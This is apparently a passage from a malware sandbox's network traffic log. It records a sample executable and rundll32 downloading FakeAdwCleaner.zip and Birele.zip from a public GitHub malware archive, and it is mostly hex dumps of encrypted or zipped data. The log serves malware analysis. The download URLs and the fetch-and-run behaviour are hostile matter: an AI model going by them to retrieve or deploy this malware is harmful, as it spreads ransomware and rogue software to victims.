                                                                                                                                                2022-09-29 12:49:46 UTC11729INData Raw: 95 4e eb 4f 8d 90 d0 bf a5 64 ab 71 48 02 03 86 99 b0 41 12 fb 89 36 a1 9f db ee a6 9d 78 39 67 61 8a 0a c5 30 61 56 bd 56 7d 41 ca e2 ff ac 0a 44 96 de 14 c5 2d 1d de 47 73 25 13 2a 3d b2 3a 96 34 61 6e 41 38 6b 10 f8 7c 5a 8f a4 88 27 91 b7 84 25 c8 f6 91 41 02 a6 1d 32 15 aa c7 34 58 55 f2 19 de d8 6a ee e9 61 57 ef 0a 12 64 2d 4c 7c 27 09 4c 04 68 2e 4a 8b 0f 6b e3 71 2a e1 27 a8 0f a8 e6 fa c5 8a 34 cd 2a f9 64 7f 9e 61 e4 60 41 9e 1f aa 38 16 14 d8 bc e7 a1 81 a3 ef 5d f6 ae db 5d 8d 2f 72 dd b5 fd ef 9b 1e c6 2f 32 ad 36 8f 45 c8 94 88 ac 8c 2d 37 9f 10 45 48 f0 bd 1b 21 e7 89 d7 96 4a 72 2a 7b bb 97 a6 c8 7d 2d d9 a5 a7 c6 fc 3d 27 40 85 46 e7 fb 88 ed 1f 15 a7 d7 38 ed 1e 67 70 73 8a 98 6e f7 fe 00 35 ac fd d4 10 c7 b2 6b c4 54 37 34 ae a3 eb 99
                                                                                                                                                Data Ascii: NOdqHA6x9ga0aVV}AD-Gs%*=:4anA8k|Z'%A24XUjaWd-L|'Lh.Jkq*'4*da`A8]]/r/26E-7EH!Jr*{}-='@F8gpsn5kT74
                                                                                                                                                2022-09-29 12:49:46 UTC11745INData Raw: 68 7f 1f 7f b9 f1 b3 d5 67 cd 1d 5d b8 54 24 b9 8b 27 5e 32 0c 4c 9b 08 7a 4a 81 a2 76 82 8e b3 64 85 ca 23 b4 56 cc ab f2 b2 1a 18 f5 96 b1 2f 9f fa ea 81 b6 5a d0 96 93 5f b7 88 a9 d6 fe d2 8c 24 b9 e6 e5 c0 ec b9 2d cd 95 47 fe 7f f1 db 2c 24 02 4b af c9 3c ad f5 cf fd 40 5a d6 80 ce 57 1e 84 c8 d7 e7 dd df b4 73 7a fb 06 8e ed ce bf a9 5a 9e 51 80 1f b7 8c b4 8b ca 14 fe d3 00 19 2d a8 9c 1a 9d e1 bf 0a f6 5f dc 8a 3e ab 6f 4d 47 98 44 eb 3f 73 7e b0 9c 95 12 56 a5 cc f8 f3 a3 ec 5d 2e 48 4b 5d ab da 5f 6e a4 31 9e 40 0d 15 b5 ba 7a 10 b1 df 61 c2 34 b4 c1 4d 8e a5 53 dc 9a 1f 72 13 4a 3a 93 21 99 28 55 56 77 c9 a5 58 b5 13 f8 0b 8b a5 0f 34 e3 c2 84 9e 0f 2b 52 a7 31 8a 02 d1 85 66 4f b0 43 61 33 2f 84 cd 21 41 0e 55 9d 8a 17 f4 b8 bc b5 4b c2 e4 9d
                                                                                                                                                Data Ascii: hg]T$'^2LzJvd#V/Z_$-G,$K<@ZWszZQ-_>oMGD?s~V].HK]_n1@za4MSrJ:!(UVwX4+R1fOCa3/!AUK
                                                                                                                                                2022-09-29 12:49:46 UTC11761INData Raw: 2c f6 00 60 99 2b 12 7e b1 56 af 1d 18 2a e3 a6 cd 9d b5 f8 1a 03 2e 1a c3 35 ac 87 a6 c0 aa f1 96 86 f9 6b 6f 8e 6f fa 2d a6 6e 66 75 e3 6b b1 d3 b1 0b 05 52 ea 73 d9 47 a7 ca fa 0f 04 6e 94 e7 ab 54 32 55 e1 82 91 16 f6 a5 33 e5 d0 a4 59 37 8a 1a 50 bb 98 d5 6d 6b aa 42 7b aa f1 33 22 5e d5 49 01 c5 66 b0 72 d9 37 68 d3 92 a6 e2 a8 17 7d 79 7b 3b 29 e1 bc b6 c6 2c 4c 22 f8 ea 80 61 72 07 58 97 e3 4f d8 3d 25 3e 60 1e 9e da 66 2f ee 6e 6c 7c ca e6 4a da e1 4e cc 36 22 f6 ef d1 87 04 5c 36 b6 09 54 c0 f9 a5 a5 9a 56 0c b5 6f 77 68 74 31 96 ae ab 40 6e 61 38 1f c3 1e 37 31 08 cf 52 64 e4 8f dc 26 9d af 71 9d f0 c0 dc 3e ae 1a 7f b1 ad 71 f1 8a 34 16 dc 81 77 1f 16 6c 0c 69 39 42 cf 4a 17 6d a8 c8 9c 78 c9 91 33 9e b4 32 e6 3d 40 f5 20 de 38 2e 1a 1a 93 ca
                                                                                                                                                Data Ascii: ,`+~V*.5koo-nfukRsGnT2U3Y7PmkB{3"^Ifr7h}y{;),L"arXO=%>`f/nl|JN6"\6TVowht1@na871Rd&q>q4wli9BJmx32=@ 8.
                                                                                                                                                2022-09-29 12:49:46 UTC11777INData Raw: b9 51 18 a1 86 d2 cb 0b 4a 2c a4 7b 1a fc 92 f4 6f 17 f2 d2 d9 1f dd e3 18 86 58 1f 04 9b d9 d6 6e 80 e4 fd a7 7b 2b 80 df b5 01 75 73 f7 93 62 67 4c b1 f3 42 fd bb 81 57 21 c2 70 76 c2 bb 7b 6f c6 2d da 73 e7 36 78 e2 0c 46 fe 54 bc 66 db 12 34 f2 52 5c f0 aa d8 70 9a cf ae 90 6b 49 a6 e4 4c 99 37 35 07 cd 9e 1f 92 8d c7 c4 f2 27 1b f5 36 a4 43 b8 bb 5f 13 85 8b bd 09 47 ad 38 e7 98 a7 0d aa c2 01 2c 5a 2d a3 9f 3c 0d cf 77 02 cb 62 d7 4c 22 a8 de b4 cc 92 4c 26 64 26 aa a2 4e 9e 7b b6 70 76 42 cb eb 17 bc bc c8 97 d1 00 0d a4 eb 68 d6 e4 41 21 25 71 9f 78 ee 62 74 55 13 13 99 54 b5 27 36 33 a6 0b 2b dc 3a d5 82 99 17 3c de 38 1f 44 bf 28 84 f8 da b6 2d 26 f3 09 5b 46 2a 66 08 94 64 71 f2 f6 0c 15 0e a7 07 a4 68 e0 99 a2 37 fd 56 12 f4 01 96 0b 04 dd e7
                                                                                                                                                Data Ascii: QJ,{oXn{+usbgLBW!pv{o-s6xFTf4R\pkIL75'6C_G8,Z-<wbL"L&d&N{pvBhA!%qxbtUT'63+:<8D(-&[F*fdqh7V
                                                                                                                                                2022-09-29 12:49:46 UTC11793INData Raw: 66 7c fa 11 b2 59 2d 19 54 f1 ea c8 23 df fe 18 1d 6d 97 6d 8a b3 e8 3b ad 5b c6 89 6d ec 1f ba 04 7d ce a2 98 0c dd 85 d4 3e 1c cf 51 5c a6 ce 36 a8 0a bc 88 64 2c 9b cd 58 6e ae c7 6d a4 87 20 6e f4 5f f6 6e 09 8d 91 80 72 2f 3d d6 64 05 1e e3 fc bd 84 5e f0 fb a9 1d 73 6d 15 22 df 70 87 98 dc c6 f6 ae 21 19 ce 00 f4 53 2d 6e 35 7a ab 2a e0 85 30 4b f2 f2 52 4c 0c 31 5c fc b4 cb 7e a1 55 85 bd 90 d0 d3 9e 10 25 2f 33 6e 0b 6e 62 e4 f8 7f a4 0b 38 1b 8d 7e 0d 13 1f b1 e1 a9 45 39 a7 31 bf d6 5d 5a 15 61 b3 11 7b 5c e8 75 80 71 04 d8 d6 b5 50 c7 3a 68 4c 66 99 a8 30 75 64 e2 6e ed 48 41 a0 83 93 8b 2d d2 ae e5 9c a5 91 73 cb 3e 63 b1 dc 28 71 86 d6 35 2c 26 36 6f 93 d6 d5 b0 6f f6 f2 2f fb 19 e6 b1 a6 b4 19 3f bd 70 b0 e6 93 0f e5 62 64 8f 43 d8 aa 87 19
                                                                                                                                                Data Ascii: f|Y-T#mm;[m}>Q\6d,Xnm n_nr/=d^sm"p!S-n5z*0KRL1\~U%/3nnb8~E91]Za{\uqP:hLf0udnHA-s>c(q5,&6oo/?pbdC
                                                                                                                                                2022-09-29 12:49:46 UTC11809INData Raw: 1e a5 c6 7f 5e 5b 51 3c 8f 3b cc 9b fd 67 6d 64 e4 c6 22 d1 91 00 43 75 71 76 a8 67 d9 d7 b1 5d b0 f7 4a f5 bd 16 7e df 77 b0 b7 78 4c e9 ba 9c 25 cc e5 fd 10 8e b6 cd 23 9a a0 f8 2e 63 e0 ba da 2d 71 57 50 f5 9e e5 b5 83 ab 19 47 01 58 7c 50 8e ce 3c ec 1c 15 8f be 42 f7 1d a8 5d 4e b8 7b 08 7b 1c 6c 7d 31 42 ff 56 39 dd 3b bc e4 ae 73 bb 89 ec ba bd 9b 91 d7 33 4a 96 bd 5b d0 b5 81 46 99 fd fc d5 71 43 7b 3a 5a a1 1c c0 71 ef 02 31 66 c1 6b f9 37 96 50 a7 66 d1 9d 51 9f ec 87 4d e7 81 f7 30 7d 19 23 bf 36 5e 25 9a f2 0a ea 9a 2f 14 ae 8d 2b 77 4f 60 a8 5f db e8 3d 59 f7 53 8e ff de be 37 05 ed a6 d0 a1 f4 b6 c0 b4 6e d2 25 63 e1 be e9 df 32 d0 26 38 38 d8 6d 4d 6e f3 38 30 c8 f2 11 33 84 3d 4d ae c9 21 a9 9d a2 25 a7 b4 58 9d 5f 2c 8a ba 43 ee 99 39 34
                                                                                                                                                Data Ascii: ^[Q<;gmd"Cuqvg]J~wxL%#.c-qWPGX|P<B]N{{l}1BV9;s3J[FqC{:Zq1fk7PfQM0}#6^%/+wO`_=YS7n%c2&88mMn803=M!%X_,C94


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                77192.168.2.349767140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:54 UTC11815OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                78140.82.121.4443192.168.2.349767C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:54 UTC11815INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:54 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:49:54 UTC11816INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                79192.168.2.349768185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:54 UTC11818OUTGET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                8192.168.2.349687140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:29 UTC577OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                80185.199.108.133443192.168.2.349768C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:54 UTC11818INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 179477
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "38494344cdf51b86edbe1f76bf6911f46b9347e73d9f681d6b5db320a0b3f14c"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0807:AB6C:283C1A:2CD1B7:63359351
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:54 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6970-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455795.559847,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 9f4490287dba5729a283a5a24ba36d756edf9ab6
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:54:54 GMT
                                                                                                                                                Source-Age: 289
                                                                                                                                                2022-09-29 12:49:54 UTC11818INData Raw: 50 4b 03 04 14 00 01 00 08 00 86 96 4d 46 d7 12 44 12 55 bc 02 00 48 fb 02 00 1d 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 46 61 6b 65 41 64 77 43 6c 65 61 6e 65 72 2e 65 78 65 8e 63 4d 32 e6 4e f1 06 d8 1d 2c 5b 55 6f 80 61 1d 89 c5 b9 23 17 4d c1 5d 39 28 9a 83 78 47 ee 2b b5 07 8d 3b d4 30 bd 6f 54 91 12 19 11 4c a9 f2 16 dd bf 38 2c 19 f9 23 af 82 53 4b f1 f8 80 6e f2 b4 22 67 da 4e 10 9b 5b 94 a7 03 15 5b 09 c4 b3 c7 d1 e4 ed 99 13 12 6c 94 b1 03 46 99 d6 66 20 52 49 0c 59 e7 3b 2e b9 b9 0e bc 4c 3e d8 15 6f 62 84 e0 96 7f 00 cc 6b 3d 98 16 92 50 73 fa 6d b9 60 24 13 1e 11 97 fa 5d 35 5a 94 46 f2 53 dc 7f b9 2e 13 e0 5c e7 b5 66 43 0a 6b f2 de 9c b6 63 70 8f 94 7b 83 60 80 8e ea b5 75 ea cb f9 d1 3a d9 23 6a 17 21 e8 64 dc 6d c2 46 56 04 a8 ad ca f4
                                                                                                                                                Data Ascii: PKMFDUHEndermanch@FakeAdwCleaner.execM2N,[Uoa#M]9(xG+;0oTL8,#SKn"gN[[lFf RIY;.L>obk=Psm`$]5ZFS.\fCkcp{`u:#j!dmFV
                                                                                                                                                2022-09-29 12:49:54 UTC11834INData Raw: 81 b5 56 d8 59 1b 5c a4 e6 d2 90 c6 e7 4f ab 39 97 67 fa 75 2a c3 1d 18 b3 2e ac 37 5c 21 94 7c 69 18 36 2e e0 4e db 92 0c d9 b1 ca 08 c7 38 8e 81 ec 64 b0 ed 48 54 2f 70 aa e9 6e 8b b7 e3 b0 ca 7e 67 31 fe 01 8b a3 e1 0e 63 b1 42 e4 a8 b1 a0 0d 04 e6 fb 5d 09 88 64 90 fe 0c 8a 80 af a1 4e 8b 5e ea ad ac de a9 b0 f9 b7 38 96 14 82 7c ec e6 9c 78 9c df b8 2c 1a 8c 7e 01 7e 2b 63 37 10 81 43 a0 f0 89 85 70 6c 16 8d ae de d0 ec 99 c4 ef ca 32 80 81 5a 1c fc 6b 75 cf f9 7e 4c 3c fd 54 ab 86 d8 c2 23 89 e4 08 c7 a6 de f7 72 74 1d b5 79 da 2e ca 2e f5 6b 65 c3 21 0a 83 87 00 df 52 20 da 04 a5 d5 35 39 6a f4 b7 d4 1f 04 a1 67 b2 e3 af 22 7a 9a b0 84 b4 00 e9 b2 31 0b b0 70 e8 59 0c 23 0f 48 5d db 81 1c e4 e9 a0 cb 97 6a c2 b4 e1 ea d4 02 8b 16 a5 34 38 cc a9 6e
                                                                                                                                                Data Ascii: VY\O9gu*.7\!|i6.N8dHT/pn~g1cB]dN^8|x,~~+c7Cpl2Zku~L<T#rty..ke!R 59jg"z1pY#H]j48n
                                                                                                                                                2022-09-29 12:49:54 UTC11850INData Raw: ab a8 2b 49 77 fe 93 07 87 6b fa 0d 8a 5d f3 a6 39 d3 20 94 9c 2d d8 19 c5 15 70 84 0a dd 31 9b 84 1c d0 e4 ce 2c 99 9b 60 54 ab 32 59 a9 01 44 e5 e4 3d 5d c9 ab ff 81 9b 10 1b b9 e1 27 2e 58 6e 6d c4 a0 41 ea 13 86 85 ce e2 a9 e0 d4 23 32 e7 a3 b2 95 ca 50 5e 27 f8 1e bc da c9 f4 9d 05 ed af 46 66 b5 49 0f 54 fe 4d 7f 38 2b 89 a1 1b 22 7c 19 40 8e a5 33 db 1d 95 07 b2 e9 ff 4d b7 15 ca f9 24 19 e4 ff 4c d8 13 cd 1f 10 71 5c c6 63 95 b6 10 da 61 2b 6a 15 ce 28 de 9a 12 4a ba 15 81 d8 60 5c ca dc 54 1e 3a a9 b6 a1 b1 ec 5b e0 64 db db 36 67 d6 b2 52 2b 9c f0 e1 df 0b 48 a8 c4 5e 5f a3 83 7b a8 e3 99 65 65 6a fb fe 1b 38 ea 17 88 19 15 f3 b4 d3 a7 f2 1f 3d 91 26 51 8f fc 68 3f 43 31 c8 63 a0 f5 bf ae d3 3a c3 66 06 56 c2 69 0f 71 00 5d be 68 48 bf 46 3c bd
                                                                                                                                                Data Ascii: +Iwk]9 -p1,`T2YD=]'.XnmA#2P^'FfITM8+"|@3M$Lq\ca+j(J`\T:[d6gR+H^_{eej8=&Qh?C1c:fViq]hHF<
                                                                                                                                                2022-09-29 12:49:54 UTC11866INData Raw: 5c 3f 01 47 71 77 0f 35 7e 81 1e c0 0f 00 a0 e0 e7 54 70 a5 21 5e 05 aa ce cf 4c cf 10 8e ef 76 62 df 1a af 58 fc 21 d2 95 68 75 b0 51 ff db 7e 39 be 81 62 cd 09 50 d7 41 ce 10 be cf 5e 2d ca 1c 03 96 49 37 70 35 b4 29 ab 25 59 29 4b df 1a de b0 a4 94 e6 c1 0e c7 72 b0 0a ea e2 e2 e3 b3 5c 03 19 80 cc 05 71 7f 1c 2d 82 49 48 32 10 c0 8c 35 30 92 fe f2 92 5a 0e a6 03 90 85 ce 39 7b ab f7 ff e3 5c b5 b1 6e 4c ae 2d 87 a6 80 3a 7a c3 14 59 52 92 a5 95 5f a1 17 2e 51 32 9b e5 76 a7 9f fd 56 d4 88 3f cb 10 6c da 96 83 bc 4b 83 6e 43 52 2a f5 7c 20 a5 2b e6 e5 d5 8e 5b 2c 4e 08 3c 04 32 95 6d 5c 39 8a ee b8 af c7 db 44 b3 d2 bd 14 af 42 16 cc f3 2b 03 07 a4 48 9f 6e 94 b2 f7 ce e4 69 49 eb b3 cb 0e c6 e3 67 1e 56 66 12 9f ad 27 47 b9 a2 4b da 64 04 cb 3b 4d 25
                                                                                                                                                Data Ascii: \?Gqw5~Tp!^LvbX!huQ~9bPA^-I7p5)%Y)Kr\q-IH250Z9{\nL-:zYR_.Q2vV?lKnCR*| +[,N<2m\9DB+HniIgVf'GKd;M%
                                                                                                                                                2022-09-29 12:49:54 UTC11882INData Raw: 9b 61 6d 6d fc 79 8b 6a 69 e9 3e 98 42 53 ae 9a 31 ca 0b dd f5 47 3f 86 7d 4f 0a 7a 91 b9 f5 e5 7b e5 98 2d f5 5b 41 94 73 7f 0e 24 60 cd 6b b7 3b c9 17 f8 ca 4b a6 24 3a 51 34 eb 3d c3 8c 41 c6 0b 8a f7 b1 29 6e 50 a1 ea 4d 82 fd 71 15 5f bf 15 e4 45 3c 37 9e f6 d1 a7 f5 a0 99 23 a2 6f 19 6e 63 6c 8b 26 1f 78 39 29 a7 d0 7b eb d8 ec ac e5 84 1c f8 41 0b ee e3 d2 5f fd 74 8e dc 2f e0 35 1d 64 db 2e 30 1e 3d 7d 9d a9 e9 f1 e3 c0 24 a5 b7 53 cf 9b 35 75 61 d6 d8 0d 94 fa 53 20 97 58 48 d7 ad 07 20 c2 cc 19 c4 89 2c f7 d9 59 33 ac 74 18 8d e0 3c e4 51 58 2c 11 98 ee 31 38 6f f3 9d e5 00 3f 11 83 83 4d 93 79 40 93 2e c6 44 c3 10 c3 a8 7e fb 9b b5 96 28 59 65 8e ee ca 84 c1 ea fd 9d c4 a1 f2 ce af 56 a5 46 96 cd 3e 1b e0 d4 bc 86 77 cd 0d 45 88 bf bc 52 51 83
                                                                                                                                                Data Ascii: ammyji>BS1G?}Oz{-[As$`k;K$:Q4=A)nPMq_E<7#oncl&x9){A_t/5d.0=}$S5uaS XH ,Y3t<QX,18o?My@.D~(YeVF>wERQ
                                                                                                                                                2022-09-29 12:49:54 UTC11898INData Raw: 5f 8b 72 e8 a4 ff 00 60 b0 d6 3b 81 0d d3 b4 97 8b a5 6d 55 94 ef 0f 87 4d ab 78 35 cb db 0f c4 f3 49 42 9a bf 7c 34 55 1b f2 39 e6 05 e2 37 cf ce 4b fd b0 20 7d df 88 3b ed cf fe 65 00 75 94 61 88 fc e8 a2 9d 43 41 24 78 bb a7 c3 8e 4d 2e 2b 49 f1 25 59 8d e5 c9 3a 31 20 ec 9b 0f 4b ef c8 fe de 0c f6 3c c8 49 12 ca a5 cb 93 50 b6 9d 83 db 95 cd 09 e0 e0 44 31 2c 98 15 93 3f af bd ae f4 d2 b5 7b d6 11 58 f4 6b 33 2c 55 e0 de 3b 69 ab 3b 8f 84 9a 0c 4c 24 3f 97 d4 fa 4a d5 92 4b e6 d7 9b 1f 63 77 a0 aa 5d b0 a8 02 ec a1 3f 61 2b 50 e0 40 4f b1 f2 4e 9e e9 f7 f3 72 80 45 22 55 1d 2d eb 0e e6 58 a2 42 a5 61 a3 f6 6b e1 7c 6f a3 7c 81 0b a7 04 0f 0a 2d 3b 8c ed ac f4 eb a5 6f f5 1f 44 92 4a e0 5c ae f3 f5 b6 98 6a 04 b6 10 30 6c c8 21 72 92 65 e8 3a 26 ec 84
                                                                                                                                                Data Ascii: _r`;mUMx5IB|4U97K };euaCA$xM.+I%Y:1 K<IPD1,?{Xk3,U;i;L$?JKcw]?a+P@ONrE"U-XBak|o|-;oDJ\j0l!re:&
                                                                                                                                                2022-09-29 12:49:54 UTC11914INData Raw: 5e 86 9c 78 b5 dc 50 b5 ba 02 68 6d b8 83 c0 20 aa 9a 64 c2 97 54 2c 97 59 92 aa 49 74 6b 1a d8 07 dd a3 79 49 ac 7c 72 d5 70 d3 a1 ee f9 6e 93 45 63 35 a6 39 bf cc 17 6b 26 89 78 e8 0c f1 b6 56 71 b6 4d cf 5b 92 ca 74 af 41 dc e0 7d f4 e6 17 ab 55 1b 68 0f 86 ac 4b aa 3c 34 ff 1f 45 36 28 04 77 7e a1 ea 38 28 20 d8 59 b2 de f2 c0 62 8c dd 51 67 92 a6 9a 96 60 d3 86 87 71 35 99 dc ea 91 09 e1 bc 7a a2 c6 21 d4 1f 9c e2 eb 33 43 ea 8c e1 63 5e 30 49 7e 19 bb de ee 5a d4 dc d4 ab 73 e0 08 e7 ac a0 17 9a bc c4 82 b5 70 de 60 93 d2 9f 1e a6 00 02 d6 8a 74 48 f6 ad f1 7a a0 9b 01 46 57 07 62 00 46 3d cd ec 71 fa d4 43 4d b5 f7 be 86 bb 6b f8 09 a5 af a3 97 eb 1f 1b be 10 52 02 83 17 79 20 39 1d 18 43 b5 e7 35 ab 55 7a 32 ad 6e 4b df f2 35 ef f0 b5 79 64 0d e4
                                                                                                                                                Data Ascii: ^xPhm dT,YItkyI|rpnEc59k&xVqM[tA}UhK<4E6(w~8( YbQg`q5z!3Cc^0I~Zsp`tHzFWbF=qCMkRy 9C5Uz2nK5yd
                                                                                                                                                2022-09-29 12:49:54 UTC11930INData Raw: f1 9b a0 5b 96 4e ff 66 71 05 a4 be af fa 01 80 08 03 23 24 5f 2b c4 2a 47 fd f6 01 c8 06 2c fd 51 e1 b5 c5 e3 09 18 0f 09 6a 85 e5 36 70 62 a0 c8 b7 9d 33 30 e0 fe 7a 9f a0 50 2d aa 70 f1 50 b0 f9 5e 8f 1a 31 85 25 df 6a 3d ac dc af 14 b8 f5 98 aa bc e3 bf da 5a 35 5e 3e 38 d4 ec 12 79 0b 78 d7 e4 92 58 49 ee 24 c1 22 95 d4 ef 45 f4 36 2e 72 0c c2 49 39 09 23 a6 fc c7 ed 5d 37 f8 c2 27 d8 ab 25 28 63 70 8d 5c ea 83 4e c6 40 f5 c6 46 bb 67 26 e1 11 23 55 58 a8 79 a1 50 44 59 e0 2e 12 98 4d c2 8d e2 0a 11 f4 7f 4e f0 f5 cd 63 71 52 e0 19 c7 21 14 00 62 81 9c 03 1f e4 88 21 28 c8 76 10 d8 af 79 5f 11 65 40 29 61 69 54 17 62 0e af c3 4d f0 d8 31 1b 51 58 cf f8 bf 70 ba cf d9 24 7d 69 72 2f 05 f5 f6 03 6f 03 28 d8 4f 72 56 d1 d7 5d 08 2c 1b 49 f2 45 16 2e 4e
                                                                                                                                                Data Ascii: [Nfq#$_+*G,Qj6pb30zP-pP^1%j=Z5^>8yxXI$"E6.rI9#]7'%(cp\N@Fg&#UXyPDY.MNcqR!b!(vy_e@)aiTbM1QXp$}ir/o(OrV],IE.N
                                                                                                                                                2022-09-29 12:49:54 UTC11946INData Raw: 10 12 91 79 d0 04 5f 76 57 50 77 bb 51 b1 6d 12 0b f9 7f ff d1 3b b6 79 0c 4c d8 79 67 04 79 81 a0 f4 a3 ea a7 40 4c dc fd ae 2b db 3f 4e ee a3 0c ba f8 0d c8 60 6e da 93 1c 1d 09 0b 4f 0e f0 32 dd d2 23 97 43 bc da b4 ab 82 9d 28 59 55 f6 05 43 19 e3 79 f3 19 57 bd 3f 01 fe 67 3f c4 04 d9 a3 8e a2 44 9c 45 49 b0 00 cc a5 57 6f ad 9e a9 8e ff 1c 45 cc a6 d4 a6 fc 6d ec a3 2d fb a7 b1 5b bf 57 cb 18 d2 35 ad 6b 4f be ff 38 8e 4b 8a 29 a0 10 9b d8 2e a2 e9 c6 9a 41 1d 56 89 d6 b3 12 a3 13 22 5d 81 6f 9b 43 00 73 5b 14 20 7d 2e e4 92 53 85 02 d8 24 d0 ca 87 f1 ef f2 1a b0 25 aa ad 46 3f 6d 2b bf 10 24 6a aa 32 78 e7 45 f9 85 b8 21 dc 1c 41 19 c7 a6 b8 5d c0 01 8e 30 c8 fd 88 9e 47 fb ce 29 a7 e5 27 46 c5 80 96 7a 4d cb 10 d7 4a 4b cd 39 b8 0a fb 50 2e ea 86
                                                                                                                                                Data Ascii: y_vWPwQm;yLygy@L+?N`nO2#C(YUCyW?g?DEIWoEm-[W5kO8K).AV"]oCs[ }.S$%F?m+$j2xE!A]0G)'FzMJK9P.
                                                                                                                                                2022-09-29 12:49:54 UTC11962INData Raw: 69 17 b7 1c 49 c1 de f1 70 ff 84 cb fa 0f 91 64 d6 97 1b 2a 6a 50 01 31 3f 26 e5 ea 65 0f e1 69 9b a8 21 47 98 d8 f4 f2 2b d1 9c 7b 36 01 55 cc 1c a8 a5 ba 3e 50 5d 47 38 1d 47 d3 f9 40 af 28 9b 35 9c 81 7a 4a f0 a6 f9 e2 09 26 af ad 2b 7e 66 da 97 d1 54 bc 47 be e3 7b a4 32 d9 10 90 aa 26 bd d0 e6 e6 40 9f 7c 9f 68 af e1 dc 88 d1 f0 67 50 26 cb 17 fe af 38 76 d2 c5 95 97 0d ae 78 88 70 f0 41 52 72 3b ca 49 f0 e1 4c af 5e f4 e2 cb 77 6e d2 18 3e 12 d3 bd 4f e4 8c 72 83 8a 12 e5 00 82 49 2c 24 83 6c a6 2f 90 98 fe 2f bb 90 7e 1d 20 16 31 0c 6f 5c c4 21 83 9d b3 4c a8 cc 2c 7e e9 73 80 fc 8d ce 1d 35 d3 7e 86 6e 7d b8 83 3a 97 c5 f1 19 01 c7 86 18 ea 18 4d ad ce 80 59 e8 1c 22 77 c9 0d 7b e5 d1 b8 98 9c 37 e9 34 d3 44 a9 e5 8e 93 c8 c9 a8 2a 34 4e 46 5b 2d
